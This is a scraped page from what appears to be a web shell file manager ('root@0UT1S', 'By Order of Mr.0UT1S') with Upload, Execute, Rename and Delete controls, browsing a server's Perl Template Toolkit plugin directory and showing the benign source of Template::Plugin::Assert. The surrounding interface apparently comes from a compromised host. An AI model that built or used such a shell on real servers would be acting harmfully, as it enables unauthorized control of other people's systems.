usr
/
local
/
lib64
/
perl5
/
Template
/
Plugin
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
Assert.pm
3.43 KB
Rename
Delete
Datafile.pm
4.40 KB
Rename
Delete
Date.pm
11.22 KB
Rename
Delete
Directory.pm
10.90 KB
Rename
Delete
Dumper.pm
3.66 KB
Rename
Delete
File.pm
10.92 KB
Rename
Delete
Filter.pm
9.63 KB
Rename
Delete
Format.pm
1.79 KB
Rename
Delete
HTML.pm
5.87 KB
Rename
Delete
Image.pm
11.43 KB
Rename
Delete
Iterator.pm
1.95 KB
Rename
Delete
Math.pm
3.99 KB
Rename
Delete
Pod.pm
1.61 KB
Rename
Delete
Procedural.pm
3.59 KB
Rename
Delete
Scalar.pm
3.67 KB
Rename
Delete
String.pm
17.69 KB
Rename
Delete
Table.pm
12.41 KB
Rename
Delete
URL.pm
5.67 KB
Rename
Delete
View.pm
2.40 KB
Rename
Delete
Wrap.pm
3.18 KB
Rename
Delete
#============================================================= -*-Perl-*- # # Template::Plugin::Assert # # DESCRIPTION # Template Toolkit plugin module which allows you to assert that # items fetches from the stash are defined. # # AUTHOR # Andy Wardley <abw@wardley.org> # # COPYRIGHT # Copyright (C) 2008-2022 Andy Wardley. All Rights Reserved. # # This module is free software; you can redistribute it and/or # modify it under the same terms as Perl itself. # #============================================================================ package Template::Plugin::Assert; use base 'Template::Plugin'; use strict; use warnings; use Template::Exception; our $VERSION = '3.100'; our $MONAD = 'Template::Monad::Assert'; our $EXCEPTION = 'Template::Exception'; our $AUTOLOAD; sub load { my $class = shift; my $context = shift; my $stash = $context->stash; my $vmethod = sub { $MONAD->new($stash, shift); }; # define .assert vmethods for hash and list objects $context->define_vmethod( hash => assert => $vmethod ); $context->define_vmethod( list => assert => $vmethod ); return $class; } sub new { my ($class, $context, @args) = @_; # create an assert plugin object which will handle simple variable # lookups. return bless { _CONTEXT => $context }, $class; } sub AUTOLOAD { my ($self, @args) = @_; my $item = $AUTOLOAD; $item =~ s/.*:://; return if $item eq 'DESTROY'; # lookup the named values my $stash = $self->{ _CONTEXT }->stash; my $value = $stash->dotop($stash, $item, \@args); if (! defined $value) { die $EXCEPTION->new( assert => "undefined value for $item" ); } return $value; } package Template::Monad::Assert; our $EXCEPTION = 'Template::Exception'; our $AUTOLOAD; sub new { my ($class, $stash, $this) = @_; bless [$stash, $this], $class; } sub AUTOLOAD { my ($self, @args) = @_; my ($stash, $this) = @$self; my $item = $AUTOLOAD; $item =~ s/.*:://; return if $item eq 'DESTROY'; my $value = $stash->dotop($stash, $item, \@args); if (! defined $value) { die $EXCEPTION->new( assert => "undefined value for $item" ); } return $value; } 1; __END__ =head1 NAME Template::Plugin::Assert - trap undefined values =head1 SYNOPSIS [% USE assert %] # throws error if any undefined values are returned [% object.assert.method %] [% hash.assert.key %] [% list.assert.item %] =head1 DESCRIPTION This plugin defines the C<assert> virtual method that can be used to automatically throw errors when undefined values are used. For example, consider this dotop: [% user.name %] If C<user.name> is an undefined value then TT will silently ignore the fact and print nothing. If you C<USE> the C<assert> plugin then you can add the C<assert> vmethod between the C<user> and C<name> elements, like so: [% user.assert.name %] Now, if C<user.name> is an undefined value, an exception will be thrown: assert error - undefined value for name =head1 AUTHOR Andy Wardley E<lt>abw@wardley.orgE<gt> L<http://wardley.org/> =head1 COPYRIGHT Copyright (C) 2008-2022 Andy Wardley. All Rights Reserved. This module is free software; you can redistribute it and/or modify it under the same terms as Perl itself. =head1 SEE ALSO L<Template::Plugin> =cut # Local Variables: # mode: perl # perl-indent-level: 4 # indent-tabs-mode: nil # End: # # vim: expandtab shiftwidth=4:
Save